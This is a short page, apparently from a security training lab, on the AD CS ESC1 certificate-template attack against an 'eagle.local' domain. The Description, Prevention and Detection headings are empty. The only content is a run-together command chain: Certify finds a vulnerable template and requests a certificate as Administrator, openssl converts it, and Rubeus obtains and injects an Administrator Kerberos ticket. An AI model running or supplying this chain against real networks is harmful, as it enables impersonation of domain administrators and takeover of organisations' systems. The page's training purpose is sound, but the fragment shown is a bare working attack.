PKI - ESC1
Description
Attack Execution: ESC1 Example
.\Certify.exe find /vulnerable.\Certify.exe request /ca:PKI.eagle.local\eagle-PKI-CA /template:UserCert /altname:Administratorsed -i 's/\s\s\+/\n/g' cert.pem openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx.\Rubeus.exe asktgt /domain:eagle.local /user:Administrator /certificate:cert.pfx /dc:dc1.eagle.local /ptt
Prevention
Detection
Remote Session Monitoring
Last updated